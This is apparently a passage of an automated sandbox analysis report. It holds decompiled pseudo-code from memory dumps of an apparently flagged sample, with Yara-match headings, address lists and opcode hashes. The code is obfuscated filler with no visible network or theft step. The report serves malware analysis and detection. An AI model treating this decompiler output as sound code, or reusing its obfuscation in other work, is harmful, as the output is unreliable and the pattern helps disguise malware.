                                  					__edi = __edi +  *0xf46adf74;
                                  					__eflags = __edi;
                                  					if(__edi <= 0) {
                                  						__ecx =  *0x7c60467f * 0xecd;
                                  						__eflags =  *0xcf0ca8c8 & __eax;
                                  						asm("sbb edx, [0xd7b12d4]");
                                  						__eax =  *0x3f9f366b * 0x91f4;
                                  						 *0x6ad20795 =  *0x6ad20795 >> 0xf;
                                  						asm("adc ebx, 0x105f9198");
                                  						__ebx = __ebx | 0xc53bd305;
                                  						_pop(__ebp);
                                  						 *0x58241212 =  *0x58241212 >> 0xb1;
                                  						 *0x801110c4 =  *0x801110c4 ^ __eax;
                                  						__ebx = __ebx +  *0x79c6365;
                                  						__eflags = __ebx - 0x9f8f81d9;
                                  						_push(__edi);
                                  						 *0x27096061 =  *0x27096061 & __ebp;
                                  						__ebp =  *0xa0fc4bc4;
                                  						 *0xc025eb02 =  *0xc025eb02 | __al;
                                  						 *0x2e2f810a =  *0x2e2f810a - __dl;
                                  						__ecx =  *0x7c60467f * 0xecd - 1;
                                  						__ch = __ch - 0xe5;
                                  						asm("movsb");
                                  						__esp = 0xb30272cf;
                                  						__ebx = __ebx & 0xf961cd17;
                                  						__eflags = __ebx;
                                  						if(__ebx < 0) {
                                  							_pop( *0x9ed82879);
                                  							asm("stosd");
                                  							 *0xbe0c9761 = __ecx;
                                  							__edi = __edi -  *0x36774226;
                                  							__eax = __eax + 1;
                                  							__esp = 0xffffffffff93faef;
                                  							__eflags = 0xb30272cf;
                                  							if(0xb30272cf > 0) {
                                  								__esi =  *0x5f1bef7e * 0x2102;
                                  								__eax = __eax + 1;
                                  								__eflags = __esi -  *0x3af333fc;
                                  								__ecx = __ecx |  *0x488d628b;
                                  								asm("rcr dword [0x396faa93], 0xc8");
                                  								__esp = 0xffffffffff93faef ^  *0xa5cf261;
                                  								__eflags = 0xb30272cf;
                                  								if(0xb30272cf == 0) {
                                  									__edx = __edx + 0x8a113275;
                                  									__eflags = __edx;
                                  									if(__edx == 0) {
                                  										 *0x12f26175 =  *0x12f26175 - __ebp;
                                  										__ebx = __ebx ^ 0x939183cf;
                                  										__ebx = __ebx + 1;
                                  										_pop( *0xe54ac211);
                                  										__ebx = __ebx + 1;
                                  										asm("sbb esi, 0xe026c629");
                                  										__eflags =  *0x4b7b1aee & __esi;
                                  										asm("cmpsb");
                                  										0x20336a3d = 0x20336a3d +  *0xe81e4cb9;
                                  										__ah = __ah &  *0x5550571c;
                                  										__eax = 0x55045fc1;
                                  										__dl = __dl ^ 0x00000002;
                                  										__edi = __edi &  *0x1f8a2a6d;
                                  										__dh =  *0x3b0645f2;
                                  										 *0x950aabc1 =  *0x950aabc1 << 0xa7;
                                  										asm("rcl dword [0x43d7a366], 0x64");
                                  										__ch = __ch ^  *0xdecae082;
                                  										__al =  *0xb91e4e02;
                                  										__eflags = __al & 0x0000003a;
                                  										__ecx = __ecx - 1;
                                  										__al = __al +  *0x79784dc9;
                                  										asm("sbb bh, [0xa66c2f1a]");
                                  										__eax = 0x55045fc1 ^  *0x58f4d93f;
                                  										asm("adc eax, [0x1031dbff]");
                                  										__eflags = __ecx & 0x670e4b13;
                                  										 *0xab36a4dd =  *0xab36a4dd | __esi;
                                  										__ebp = __ebp & 0x56313285;
                                  										 *0x2c9bcb36 =  *0x2c9bcb36 + 0x55045fc1;
                                  										__eflags = __bl & 0x000000c9;
                                  										 *0x44916d67 =  *0x44916d67 ^ __ebx;
                                  										__ebp = __ebp &  *0x9d4b3985;
                                  										asm("adc ebx, [0x24e203ef]");
                                  										__eflags = __cl;
                                  										__dh =  *0x382bd91a;
                                  										 *0x382bd91a =  *0x3b0645f2;
                                  										if(__eflags > 0) {
                                  											asm("adc ebx, [0x9f2c4c76]");
                                  											asm("adc edi, [0x2f76812b]");
                                  											if(__eflags < 0) {
                                  												 *0xd64c1379 =  *0xd64c1379 << 0x8c;
                                  												__ebp = 0x9e7fdf9b;
                                  												 *0xe3120bd1 =  *0xe3120bd1 << 0x18;
                                  												__esp = __esp & 0xdb5cdd35;
                                  												__esi =  *0xc83e99d3;
                                  												_pop(__edi);
                                  												 *0x2b726d94 = __edx;
                                  												__eflags =  *0x705682be & __edi;
                                  												if(( *0x705682be & __edi) != 0) {
                                  													 *0xe0c96274 =  *0xe0c96274 >> 0x5e;
                                  													__ebx = __ebx |  *0xbfeac005;
                                  													__eflags = __ebx;
                                  													__al = 0x8a;
                                  													if(__ebx < 0) {
                                  														__ebx = 0x6ba1dd73;
                                  														_t25 = __esi;
                                  														__esi =  *0x67348d6c;
                                  														 *0x67348d6c = _t25;
                                  														__ch = __ch |  *0xd1449e4;
                                  														 *0xfc2418 =  *0xfc2418 ^ __dh;
                                  														 *0x4e04c82 & __bl = __ah -  *0x3c3ba0d0;
                                  														 *0x357cb1a0 =  *0x357cb1a0 << 0x92;
                                  														asm("adc ch, 0x34");
                                  														asm("ror byte [0xc4cd2ad0], 0xf0");
                                  														asm("stosd");
                                  														asm("adc ecx, 0x9ccf8633");
                                  														__eflags =  *0xd046f63a & __dh;
                                  														asm("cmpsb");
                                  														__eflags =  *0x3c53b905 & __edx;
                                  														_push(__ecx);
                                  														if(( *0x3c53b905 & __edx) < 0) {
                                  															 *0x3db10571 =  *0x3db10571 << 0xaa;
                                  															__eflags =  *0x5714927 & 0x55045fc1;
                                  															asm("sbb esi, [0x5a4b5dbd]");
                                  															if(( *0x5714927 & 0x55045fc1) < 0) {
                                  																asm("sbb ecx, [0x5ab90571]");
                                  																asm("adc edi, [0x5714ec5]");
                                  																__edx = __edx -  *0x50c955c5;
                                  																__eflags = __edx;
                                  																if(__edx < 0) {
                                  																	__eflags = __ecx & 0x54c10571;
                                  																	_push(0x9e7fdf9b);
                                  																	__esi =  *0x94037160 * 0x3e73;
                                  																	__cl = __cl &  *0x64759204;
                                  																	__eflags =  *0x749e040a & __dl;
                                  																	__edi =  *0xa4040a6b * 0x7176;
                                  																	 *0x7fab040a =  *0x7fab040a << 0x9e;
                                  																	__eflags =  *0x7fab040a;
                                  																	if( *0x7fab040a < 0) {
                                  																		__eflags =  *0x6e050a73 & __edx;
                                  																		asm("sbb ecx, [0x71542e3d]");
                                  																		asm("adc esp, [0x49657a05]");
                                  																		_pop(__edx);
                                  																		if(( *0x6e050a73 & __edx) < 0) {
                                  																			__ebx = 0x6ba1dd73 &  *0x537f0571;
                                  																			__eax = __eax - 1;
                                  																			__eflags = 0x55045fc1;
                                  																			_pop(__esp);
                                  																			if(0x55045fc1 < 0) {
                                  																				asm("rcl dword [0x93b60771], 0xb");
                                  																				if(0x55045fc1 >= 0) {
                                  																					__esi =  *0x5a3a8c7c * 0x760;
                                  																					__eflags = __edi -  *0xa7a6b4c4;
                                  																					__esp = __esp -  *0x760583f;
                                  																					 *0xc5b5c5ef =  *0xc5b5c5ef >> 0x24;
                                  																					__ecx = __ecx - 1;
                                  																					_pop(__esi);
                                  																					__esp =  *0x98d20760 * 0x8681;
                                  																					 *0x8605624 =  *0x8605624 << 0x72;
                                  																					__eflags =  *0xd4a7cfdc - __esi;
                                  																					if( *0xd4a7cfdc <= __esi) {
                                  																						asm("adc ebp, [0xc9ab7277]");
                                  																						 *0x68032a08 = 0x8a;
                                  																						_push(0x996fb2fd);
                                  																						asm("adc ch, 0xc9");
                                  																						asm("sbb bh, 0x8");
                                  																						__eflags =  *0x8eafb30 & __dh;
                                  																						asm("sbb esi, 0x8c9a46c");
                                  																						asm("sbb dh, 0xa");
                                  																						__ah = __ah &  *0xa6ef40e3;
                                  																						__esp =  *0x9c99d6b * 0xa7db;
                                  																						asm("adc eax, [0x3055a78f]");
                                  																						asm("sbb esp, 0x9c03d35");
                                  																						L1();
                                  																						__esi = __esi |  *0xc330c5e8;
                                  																						__eflags =  *0x25f20067 & __edi;
                                  																						__ecx = __ecx +  *0x133809c0;
                                  																						asm("rcl byte [0x38d43682], 0x7c");
                                  																						__eflags =  *0xac03a1f - 0x9e7fdf9b;
                                  																						__ebx = __ebx - 0x9c8593dc;
                                  																						__esp = 0xab431c6c +  *0x9c99d6b * 0xa7db;
                                  																						asm("adc edx, [0x730bb30b]");
                                  																						 *0xe331892a =  *0xe331892a + __ah;
                                  																						asm("sbb [0x9cc297d0], ch");
                                  																						asm("sbb esi, [0x24087fd4]");
                                  																						__edx -  *0x8cdbbbd5 =  *0x11c9a56e & __edx;
                                  																						if(( *0x11c9a56e & __edx) > 0) {
                                  																							__eax =  *0x434e397e * 0x8005;
                                  																							 *0x3200333f =  *0x3200333f & 0x6ba1dd73;
                                  																							__al = 0xeb;
                                  																							__eax =  *0x434e397e * 0x8005 - 1;
                                  																							__esi = __esi ^  *0xe961f499;
                                  																							__eflags = __esi;
                                  																							if(__esi >= 0) {
                                  																								 *0xb3fc1478 =  *0xb3fc1478 + __edx;
                                  																								__esp = __esp +  *0x235cb837;
                                  																								 *0x73e3921a =  *0x73e3921a << 9;
                                  																								 *0x7922e1e3 =  *0x7922e1e3 << 0xd2;
                                  																								__eflags =  *0x3c0be221 & __edx;
                                  																								if(( *0x3c0be221 & __edx) < 0) {
                                  																									asm("sbb [0xef127a73], ecx");
                                  																									asm("adc edx, 0xe584c7a9");
                                  																									__esp = __esp & 0xf5419cf7;
                                  																									__eflags = __esp;
                                  																									if(__esp >= 0) {
                                  																										 *0xa64d0d70 & 0x9e7fdf9b = __esi & 0x7b01d217;
                                  																										__eflags =  *0xa295c0b & __ecx;
                                  																										 *0x44d0d01a =  *0x44d0d01a << 0xdb;
                                  																										__eflags =  *0x44d0d01a;
                                  																										if( *0x44d0d01a < 0) {
                                  																											__edx =  *0x7fc10c7d * 0x9906;
                                  																											__edx =  *0x7fc10c7d * 0x00009906 |  *0x4b3add3b;
                                  																											 *0x68fd0cfd =  *0x68fd0cfd - __eax;
                                  																											__eflags = __edi - 0x2e3b7292;
                                  																											__ebx = __ebx +  *0xf6273d31;
                                  																											asm("rcr dword [0xf107bdef], 0xa8");
                                  																											asm("stosd");
                                  																											asm("sbb [0x9d85b205], edi");
                                  																											__esp =  *0x180a1660 * 0x7f87;
                                  																											 *0x322b751f =  *0x322b751f - __edx;
                                  																											 *0x5940e838 =  *0x5940e838 >> 0x44;
                                  																											0xffffffff67dbf08e = 0xffffffff67dbf08d;
                                  																											asm("adc bh, 0x8");
                                  																											__ebp =  *0x90288b6f;
                                  																											 *0x90288b6f = 0xffffffff67dbf08d;
                                  																											__edi = __edi | 0x20bf1211;
                                  																											 *0xf8f352ba =  *0xf8f352ba & 0x6ba1dd73;
                                  																											__ebx = __ebx +  *0xbb5a0e66;
                                  																											__eflags = 0x6ba1dd73;
                                  																											if(0x6ba1dd73 > 0) {
                                  																												__edx = __edx ^  *0x9cc56176;
                                  																												__eflags = __edx;
                                  																												asm("lodsb");
                                  																												if(__edx >= 0) {
                                  																													__edx = __edx +  *0x5a3c1c78;
                                  																													__eflags =  *0x3188bfd1 & __ecx;
                                  																													_push( *0x883dde21);
                                  																													__ebp = __ebp & 0xee13bdbf;
                                  																													asm("rcl dword [0xdb0bf5f3], 0x3a");
                                  																													__ecx = __ecx &  *0xf267c498;
                                  																													 *0x96106dd2 =  *0x96106dd2 | __cl;
                                  																													__edx = 0x7f78e21e;
                                  																													__ebx = __ebx + 1;
                                  																													_pop(__ecx);
                                  																													__eflags = 0x6ba1dd73 -  *0x2b8e070e;
                                  																													asm("sbb al, 0x8a");
                                  																													__edx = __edx | 0x6b314923;
                                  																													_pop(__esi);
                                  																													__eflags =  *0x96229c99 & __esp;
                                  																													__ch = __ch + 0xb4;
                                  																													__ebx = __ebx |  *0xe5ac1719;
                                  																													__ebp = __ebp -  *0x64ab4ca3;
                                  																													asm("rol dword [0xff9d67c1], 0xc");
                                  																													 *0xaa091a9 =  *0xaa091a9 - __edi;
                                  																													_pop(__esi);
                                  																													asm("sbb ecx, [0xbfa447fe]");
                                  																													 *0xcc98a66f =  *0xcc98a66f >> 0xcc;
                                  																													__esp & 0x79b277fc =  *0x3454893b & __ebp;
                                  																													 *0x657d0e00 = __bh;
                                  																													__eflags =  *0x41297105 & __ecx;
                                  																													__ecx = __ecx ^  *0xe84ddaee;
                                  																													__ebp = __ebp +  *0xb068fced;
                                  																													__eflags = __esp -  *0x2060ed29;
                                  																													if(__esp <  *0x2060ed29) {
                                  																														__esp =  *0x18c2057d * 0x5cab;
                                  																														__eflags = __esp;
                                  																														if(__esp > 0) {
                                  																															__ebx =  *0xa513e7e * 0x5c7c;
                                  																															__eax = __eax &  *0x83a8cfdc;
                                  																															__edi = __edi |  *0x94a8083d;
                                  																															__cl = __cl | 0x00000086;
                                  																															__eax = __eax - 1;
                                  																															asm("rol byte [0x71877ee7], 0xe");
                                  																															asm("sbb ebp, 0xa40e0c83");
                                  																															asm("rcr dword [0xe333353f], 0x2");
                                  																															asm("adc ecx, [0xd037a211]");
                                  																															 *0x2718db04 =  *0x2718db04 - 0x8a;
                                  																														}
                                  																													}
                                  																												}
                                  																											}
                                  																										}
                                  																									}
                                  																								}
                                  																							}
                                  																						}
                                  																					}
                                  																				}
                                  																			}
                                  																		}
                                  																	}
                                  																}
                                  															}
                                  														}
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L1:
                                  				asm("sbb esp, [0x91ed4609]");
                                  				 *0x4f9ebbde =  *0x4f9ebbde | _t97;
                                  				 *0x4f0dc00c =  *0x4f0dc00c & _t84;
                                  				_t92 = _t92 &  *0xfdf527f5;
                                  				asm("adc dh, [0xe865f682]");
                                  				_t79 = _t79 | 0x000000e0;
                                  				_pop(_t89);
                                  				asm("sbb edi, [0x6341631f]");
                                  				_push(_t74);
                                  				asm("rol dword [0x44580c66], 0xaf");
                                  				asm("adc ebp, [0x5c9b3ff]");
                                  				if(((_t89 |  *0x180c5fba) & 0x3c693793) < 0) {
                                  					_t79 = _t79 | 0x44830d71;
                                  					asm("cmpsw");
                                  					_t74 = _t74 + 1;
                                  					 *0xeb8796f7 =  *0xeb8796f7 - _t100;
                                  					_push(_t79);
                                  					if( *0xeb8796f7 < 0) {
                                  						asm("sbb ecx, [0x5f8c8e71]");
                                  						asm("rcr dword [0xf191e413], 0x15");
                                  						asm("adc esi, [0xa2c14a91]");
                                  						asm("sbb esi, [0x959e7f2f]");
                                  						asm("sbb edi, [0x6971c66e]");
                                  						_t79 = _t79 ^  *0x21d9a8f9;
                                  						_t74 = _t74 - 0xd7;
                                  						_t92 = _t92 +  *0x7bb225ba &  *0x84dbc09;
                                  						_pop(0xdb55218);
                                  						 *0x6b5a6b28 =  *0x6b5a6b28 & _t79;
                                  						asm("sbb ecx, [0x247f05c0]");
                                  						_t97 = _t97 -  *0x3be23cb8 + 1;
                                  						_t84 = 0x00000010 -  *0xa714619 ^  *0xb2fee9ec;
                                  						_push( *0x194e49da);
                                  						 *0x15750ab3 =  *0x15750ab3 >> 0x8e;
                                  						_t11 = _t100;
                                  						_t100 =  *0x46ef4e9e;
                                  						 *0x46ef4e9e = _t11;
                                  						 *0xb3184a0a =  *0xb3184a0a ^ _t79;
                                  						 *0x63d6250f =  *0x63d6250f ^ 0xdb55218;
                                  					}
                                  				}
                                  				goto L1;
                                  			}














                                  0x7249beda
                                  0x7249bee0
                                  0x7249bee6
                                  0x7249beeb
                                  0x7249bef1
                                  0x7249bef7
                                  0x7249befd
                                  0x7249bf04
                                  0x7249bf0a
                                  0x7249bf10
                                  0x7249bf16
                                  0x7249bf1c
                                  0x7249bf22
                                  0x7249bf28
                                  0x7249bf34
                                  0x7249bf3a
                                  0x7249bf40
                                  0x7249bf4a
                                  0x7249bf50
                                  0x7249bf52
                                  0x7249bf53
                                  0x7249bf53
                                  0x7249bf59
                                  0x7249bf5f
                                  0x7249bf65
                                  0x7249bf6b
                                  0x7249bf72
                                  0x7249bf79
                                  0x7249bf7f
                                  0x7249bf85
                                  0x7249bf8c
                                  0x7249bf92
                                  0x7249bf92
                                  0x7249bf98
                                  0x7249bfa4
                                  0x7249bfaa
                                  0x7249bfb0
                                  0x7249bfb0
                                  0x7249bfb7
                                  0x7249bfbd
                                  0x7249bfc7
                                  0x7249bfcd
                                  0x7249bfd3
                                  0x7249bfd9
                                  0x7249bfdf
                                  0x7249bfe6
                                  0x7249bfe7
                                  0x7249bfed
                                  0x7249bff7
                                  0x7249bffd
                                  0x7249c00a
                                  0x7249c00b
                                  0x7249c00e
                                  0x7249c00e
                                  0x7249c014
                                  0x7249c01a
                                  0x7249c020
                                  0x7249c020
                                  0x7249c026
                                  0x7249c02c
                                  0x7249c02c
                                  0x7249c032
                                  0x7249c033
                                  0x7249c039
                                  0x7249c03f
                                  0x7249c045
                                  0x7249c04b
                                  0x7249c056
                                  0x7249c05d
                                  0x7249c063
                                  0x7249c069
                                  0x7249c06a
                                  0x7249c06b
                                  0x7249c06c
                                  0x7249c072
                                  0x7249c074
                                  0x7249c07a
                                  0x7249c07b
                                  0x7249c081
                                  0x7249c084
                                  0x7249c08a
                                  0x7249c090
                                  0x7249c097
                                  0x7249c09d
                                  0x7249c09e
                                  0x7249c0a4
                                  0x7249c0b1
                                  0x7249c0b7
                                  0x7249c0bd
                                  0x7249c0c3
                                  0x7249c0c9
                                  0x7249c0cf
                                  0x7249c0d5
                                  0x7249c0db
                                  0x7249c0db
                                  0x7249c0e5
                                  0x7249c0eb
                                  0x7249c0f5
                                  0x7249c0fb
                                  0x7249c107
                                  0x7249c10a
                                  0x7249c10b
                                  0x7249c112
                                  0x7249c118
                                  0x7249c11f
                                  0x7249c125
                                  0x7249c125
                                  0x7249c0e5
                                  0x7249c0d5
                                  0x7249c033
                                  0x7249c026
                                  0x7249bfb7
                                  0x7249bf98
                                  0x7249bf7f
                                  0x7249bf59
                                  0x7249bf3a
                                  0x7249be9e
                                  0x7249be62
                                  0x7249be55
                                  0x7249be47
                                  0x7249be2e
                                  0x7249bdfa
                                  0x7249bde2
                                  0x7249bdc9
                                  0x7249bd79
                                  0x7249bd64
                                  0x7249bd32
                                  0x7249bd20
                                  0x7249bc68
                                  0x7249bc5c
                                  0x7249bc32
                                  0x7249bc12
                                  0x7249bb96
                                  0x7249b8d6
                                  0x7249b8d6
                                  0x7249b8dc
                                  0x7249b8e2
                                  0x7249b8e8
                                  0x7249b8ee
                                  0x7249b8f4
                                  0x7249b8f7
                                  0x7249b904
                                  0x7249b90a
                                  0x7249b911
                                  0x7249b918
                                  0x7249b924
                                  0x7249b926
                                  0x7249b92c
                                  0x7249b92e
                                  0x7249b92f
                                  0x7249b935
                                  0x7249b936
                                  0x7249b938
                                  0x7249b93e
                                  0x7249b945
                                  0x7249b94b
                                  0x7249b951
                                  0x7249b97d
                                  0x7249b983
                                  0x7249b989
                                  0x7249b98f
                                  0x7249b990
                                  0x7249b996
                                  0x7249b9a2
                                  0x7249b9a3
                                  0x7249b9a9
                                  0x7249b9af
                                  0x7249b9b6
                                  0x7249b9b6
                                  0x7249b9b6
                                  0x7249b9bc
                                  0x7249b9c2
                                  0x7249b9c2
                                  0x7249b936
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a9b489b7467d5a8fe39e8484c31faf161e2bcc9898a4846457c8fad45bb082d
                                  • Instruction ID: d799ac3e71c25c865e6b68261c0f893c535e28c50d3daed6c7a03c058ad521f7
                                  • Opcode Fuzzy Hash: 9a9b489b7467d5a8fe39e8484c31faf161e2bcc9898a4846457c8fad45bb082d
                                  • Instruction Fuzzy Hash: 8A029773908788CFE706CF38D99AB413FB2F79A724B09425EC8A153596D734251ACF89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03c2793ec5504af4caf9646d16abe438f940e8d8b65bb6d9ab5ecceb65b7990d
                                  • Instruction ID: a98c3d646b426448297f9b1a4929ba6c46b90b6b6593c9f04693f6757f7c5508
                                  • Opcode Fuzzy Hash: 03c2793ec5504af4caf9646d16abe438f940e8d8b65bb6d9ab5ecceb65b7990d
                                  • Instruction Fuzzy Hash: EBC15470901256EFDB64CF24C895BBBBBF9FF40304F04485DEA868BA81D734A845DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E7249C9A5(signed int __eax, signed char __ebx, intOrPtr __ecx, signed int __edx, void* __esi) {
                                  				void* _v3;
                                  				char _v5;
                                  				void* _t22;
                                  				signed int _t26;
                                  				signed char _t30;
                                  				signed char _t32;
                                  				signed int _t43;
                                  				signed char _t44;
                                  				signed char _t46;
                                  				void* _t55;
                                  				signed int _t62;
                                  				intOrPtr _t63;
                                  				signed int _t68;
                                  				void* _t72;
                                  
                                  				_t55 = __esi;
                                  				_t43 = __edx;
                                  				_t37 = __ecx;
                                  				_t32 = __ebx;
                                  				_t21 = __eax;
                                  				goto L1;
                                  				do {
                                  					do {
                                  						do {
                                  							L1:
                                  							asm("sbb dh, 0xb7");
                                  							_t3 = _t37;
                                  							_t37 =  *0x748f83e7;
                                  							 *0x748f83e7 = _t3;
                                  							 *0xe217dc62 =  *0xe217dc62 << 0x41;
                                  							 *0xc4bbc419 =  *0xc4bbc419 & _t32;
                                  							 *0x759084e5 =  *0x759084e5 & _t21;
                                  							_t55 = _t55 - 1;
                                  							 *0x218dd63 =  *0x218dd63 >> 0xaa;
                                  							_t4 = _t43;
                                  							_t43 =  *0xd173aeb0;
                                  							 *0xd173aeb0 = _t4;
                                  						} while (_t55 < 0);
                                  						asm("adc edx, 0xddbd1c2f");
                                  						asm("sbb bl, [0x2c16efa8]");
                                  						asm("ror dword [0xca2585c0], 0x54");
                                  						asm("sbb [0xcc32b2ef], edx");
                                  						asm("adc [0xa616efa8], ah");
                                  						 *0xa91945c6 =  *0xa91945c6 - _t37;
                                  						_t44 = _t43 -  *0xcc32c1da;
                                  						asm("adc [0x3916efa8], dl");
                                  						asm("adc esp, [0x997775c8]");
                                  						asm("sbb dl, 0xa8");
                                  						asm("adc esi, 0x45d8a8c4");
                                  						 *0xc68ff209 =  *0xc68ff209 & _t21;
                                  						 *0x3816efa8 =  *0x3816efa8 | _t44;
                                  						asm("sbb ecx, [0x173a7bc8]");
                                  						_push(_t44);
                                  						_t22 = _t21 + 1;
                                  						_push(_t22);
                                  						_push( *0xef45d88d);
                                  						 *0x81d04116 =  *0x81d04116 << 4;
                                  						_t62 =  &_v5 +  *0xef45d88d;
                                  						 *0x81c42916 = _t22;
                                  						asm("ror byte [0x4052173a], 0x73");
                                  						_push(_t22);
                                  						asm("sbb [0xef45d88d], ecx");
                                  						asm("sbb edx, [0x9cba1d16]");
                                  						asm("sbb ebx, [0xef45d88d]");
                                  						 *0x453d99a1 =  *0x453d99a1 ^ _t62;
                                  						asm("adc ecx, 0x1db40ffd");
                                  						_push( *0xe0cc3283);
                                  						asm("adc dh, 0xa8");
                                  						_pop( *0x6d2b16ef);
                                  						asm("rcr byte [0xefbe0b1c], 0x6e");
                                  						_t26 = ( *0x32ee16ef &  *0xe0cc32c1) -  *0xbe17ff2f;
                                  						 *0x16efa8e0 = _t44;
                                  						 *0x32c5f7c6 =  *0x32c5f7c6 << 0x28;
                                  						 *0x32b9d9b0 =  *0x32b9d9b0 + _t26;
                                  						 *0xefa8e0cc =  *0xefa8e0cc & _t62;
                                  						asm("ror dword [0xb3c62116], 0xaf");
                                  						 *0x49395fc0 =  *0x49395fc0 + _t26;
                                  						asm("sbb cl, 0xd2");
                                  						asm("stosb");
                                  						asm("rcr byte [0x5f828ee2], 0x5f");
                                  						asm("rcr byte [0x140b36b6], 0x70");
                                  						 *0x32ccebb8 =  *0x32ccebb8 - _t62;
                                  						asm("adc eax, 0xefa8e0cc");
                                  						 *0x8ce2a816 =  *0x8ce2a816 >> 0xb4;
                                  						asm("sbb eax, [0xaece9d8d]");
                                  						asm("sbb ch, 0x32");
                                  						 *0xefa8e0cc = _t26;
                                  						asm("sbb ebp, [0x269e8e16]");
                                  						asm("sbb ecx, 0xf2ba16ef");
                                  						_t32 = (_t32 ^ 0x000000e0 | 0x000000e0) -  *0xa8e0cc32 -  *0xf9af869a;
                                  						asm("sbb ecx, [0x395fc3cc]");
                                  						asm("sbb ch, 0xd2");
                                  						asm("stosd");
                                  						 *0x32baf2c1 =  *0x32baf2c1 + _t32;
                                  						 *0xefa8e0cc =  *0xefa8e0cc | _t32;
                                  						asm("cmpsw");
                                  						_t55 =  *0xd601ee67 -  *0xbed3f5bd;
                                  						_t46 = _t44 + 4 +  *0x71c621c;
                                  						asm("movsb");
                                  						asm("adc esp, 0xcc32c1db");
                                  						asm("ror dword [0xc4a8009a], 0x79");
                                  						 *0xef45d8a8 =  *0xef45d8a8 << 2;
                                  						asm("adc ebp, [0xa0f4be16]");
                                  						_push( *0x99d1b49b);
                                  						 *0x49395fa8 = _t46;
                                  						asm("rcr dword [0x33947a16], 0x26");
                                  						_t63 = _t62 +  *0xc1dec32e;
                                  						asm("rcr dword [0xefa8e0cc], 0x89");
                                  						asm("rcr dword [0xa0470c16], 0x92");
                                  						 *0xccecc9b4 =  *0xccecc9b4 >> 0xec;
                                  						 *0x49395fc2 = _t68 ^ 0x76a2f716 ^  *0xc1d79c01;
                                  						 *0xc48616d2 =  *0xc48616d2 + 0xfffffffffa34f215;
                                  						_t72 =  *0x49395fc2 -  *0xddbd3ccd;
                                  						asm("sbb [0xb70016ef], ebp");
                                  						 *0xac704b93 =  *0xac704b93 ^ 0xe0cc32c1;
                                  						asm("ror byte [0x395faf88], 0x8e");
                                  						_t37 = 0xfffffffffa34f2bc;
                                  						_t21 = 0xd2;
                                  						asm("rcl dword [0x94241016], 0x2");
                                  						_push(_t72);
                                  						 *0x8daddd0f =  *0x8daddd0f >> 0x23;
                                  						asm("sbb [0x16ef45d8], edi");
                                  						_t68 = _t72 - 1;
                                  						_t43 = (_t46 ^ 0x000000d2) + 0x000000b4 ^ 0x000000e0;
                                  					} while (_t43 > 0);
                                  					_pop( *0xa8008977);
                                  					asm("sbb edi, [0x9e3f16ef]");
                                  					_t37 = 0xfffffffff5aad97c;
                                  					 *0x40ecb2a1 = _t63;
                                  					 *0x8f16ef88 =  *0x8f16ef88 ^ _t32;
                                  					_push( *0x826380d6);
                                  					 *0xa8c4a800 =  *0xa8c4a800 >> 0xb9;
                                  					 *0xb2a10f9e =  *0xb2a10f9e << 0x2f;
                                  					 *0xef8840ec =  *0xef8840ec << 0xe2;
                                  					_t43 = (_t43 |  *0x45d8a8c4) ^ 0x000000d2;
                                  					_t68 = _t68 &  *0x33941616;
                                  					 *0xa8e0cc32 =  *0xa8e0cc32 << 0x70;
                                  					asm("rol dword [0xe26216ef], 0xbc");
                                  					_t21 =  *0xd8a8c4a8;
                                  					 *0xd8a8c4a8 =  *0x49395fc2;
                                  					_t55 = _t55 +  *0xd6b616ef;
                                  				} while (_t55 < 0);
                                  				_pop( *0x52173a78);
                                  				_t30 = _t21 + 1;
                                  				_push(_t30);
                                  				return _t30 | 0x00000016;
                                  			}


















                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7e846f5a257373fa011019951da3b98c7e456c27ed3a79f280a6a756d0355796
                                  • Instruction ID: eea730b3a6f5edb48a1facea7eadb1c43b2c671fa036ca3020fe6e16a850331e
                                  • Opcode Fuzzy Hash: 7e846f5a257373fa011019951da3b98c7e456c27ed3a79f280a6a756d0355796
                                  • Instruction Fuzzy Hash: A1810E32948380DFE705DF38D89A6463FB1FB46324B48038DD9A29B1D2D7B5216ACF85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 477919d2c20228dd838d3733db7428f16cf65188cc5ae071efb3549e87bfafd7
                                  • Instruction ID: 2d3366904ba14df513ec07c97dc2df9e3ce2f5e1673b0746b3220e0e23e83da9
                                  • Opcode Fuzzy Hash: 477919d2c20228dd838d3733db7428f16cf65188cc5ae071efb3549e87bfafd7
